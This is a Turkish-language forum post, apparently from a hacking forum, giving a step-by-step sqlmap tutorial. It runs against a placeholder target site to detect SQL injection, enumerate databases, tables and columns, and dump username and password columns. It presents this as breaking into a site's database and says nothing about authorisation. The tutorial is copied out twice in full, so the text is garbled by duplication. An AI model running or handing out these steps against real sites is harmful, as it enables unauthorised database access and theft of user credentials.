Cümleten Selamun Aleyküm,
Bugün [Temel] SQLMAP Kullanımını Anlatıcam.
Bunun İçin Kali Linux Gerekiyor
Hadi Başlayalım
sqlmap -u https://www.hedefsite.com/php?id=0"
--> Sitede SQL Enjeksiyonu Varmı tarar.
sqlmap got a 302 (302 Yerine başka sayıda yazabilir) redirect to 'https://www.hedefsite.com/php?id=0'. Do you want to follow? [Y/n]
--> Böyle bir şey çıkar "Y" Harfine Basıp Devam Ediyoruz.
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
--> Açık yoksa bu yazar.
sqlmap -u https://www.hedefsite.com --dbs
--> Açık Varsa Veritabanına sızar.
sqlmap -u https://www.hedefsite.com -D testsparker --tables
-> Tablo isimlerini Getirir.
sqlmap -u https://www.hedefsite.com -D testsparker -T tablo --columns
--> Kolonları Getirir.
sqlmap -u https://www.hedefsite.com -D testsparker -T tablo -C kullanici,parola --dump -->Kolonlarda yer alan veriler ekrana yansıtılır.
Bugün [Temel] SQLMAP Kullanımını Anlatıcam.
Bunun İçin Kali Linux Gerekiyor
Hadi Başlayalım
sqlmap -u https://www.hedefsite.com/php?id=0"
--> Sitede SQL Enjeksiyonu Varmı tarar.
sqlmap got a 302 (302 Yerine başka sayıda yazabilir) redirect to 'https://www.hedefsite.com/php?id=0'. Do you want to follow? [Y/n]
--> Böyle bir şey çıkar "Y" Harfine Basıp Devam Ediyoruz.
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
--> Açık yoksa bu yazar.
sqlmap -u https://www.hedefsite.com --dbs
--> Açık Varsa Veritabanına sızar.
sqlmap -u https://www.hedefsite.com -D testsparker --tables
-> Tablo isimlerini Getirir.
sqlmap -u https://www.hedefsite.com -D testsparker -T tablo --columns
--> Kolonları Getirir.
sqlmap -u https://www.hedefsite.com -D testsparker -T tablo -C kullanici,parola --dump -->Kolonlarda yer alan veriler ekrana yansıtılır.
Kullanici,Parola yerine Admin,Password Gibi de yazabilir.
İyi Forumlar
İyi Forumlar
Son düzenleme:
